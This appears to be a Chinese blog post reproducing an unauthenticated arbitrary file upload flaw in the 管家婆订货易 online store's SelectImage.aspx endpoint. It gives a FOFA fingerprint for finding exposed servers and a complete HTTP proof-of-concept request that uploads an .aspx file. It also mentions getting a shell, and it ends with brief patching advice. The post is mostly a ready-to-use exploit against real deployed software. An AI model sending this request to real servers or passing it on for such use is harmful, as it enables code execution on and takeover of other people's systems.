• 管家婆订货易在线商城任意文件上传漏洞复现


    0x01 产品简介

        管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。

    0x02 漏洞概述

      管家婆订货易在线商城SelectImage.aspx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。

    0x03 复现环境

    FOFA:icon_hash="-1513302527"

    0x04 漏洞复现

    PoC

    1. POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1
    2. Host: your-ip
    3. User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    4. Accept-Encoding: gzip
    5. Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416b
    6. --532c7611457d40f4ae4cd9422973416b
    7. Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
    8. Content-Type: image/jpeg
    9. <% Response.Write("Test"); %>
    10. --532c7611457d40f4ae4cd9422973416b--

     回显了完整的上传路径

     GetShell

     

    0x05 修复建议 

    关闭互联网暴露面,文件上传接口处设置权限控制,添加黑白名单过滤

    打补丁或升级至安全版本 

     

  • 相关阅读:
    唯一邀请码生成策略
    vant 按需导入 vue2
    Rust 实战丨绘制曼德博集
    小程序“超级入口”出现了
    day17正则表达式作业
    新知实验室
    字符串——子串查找(kmp)
    设计模式--策略模式
    AI:141-利用自然语言处理改进医疗信息提取与分类
    纳什均衡求解器
  • 原文地址:https://blog.csdn.net/qq_41904294/article/details/134518781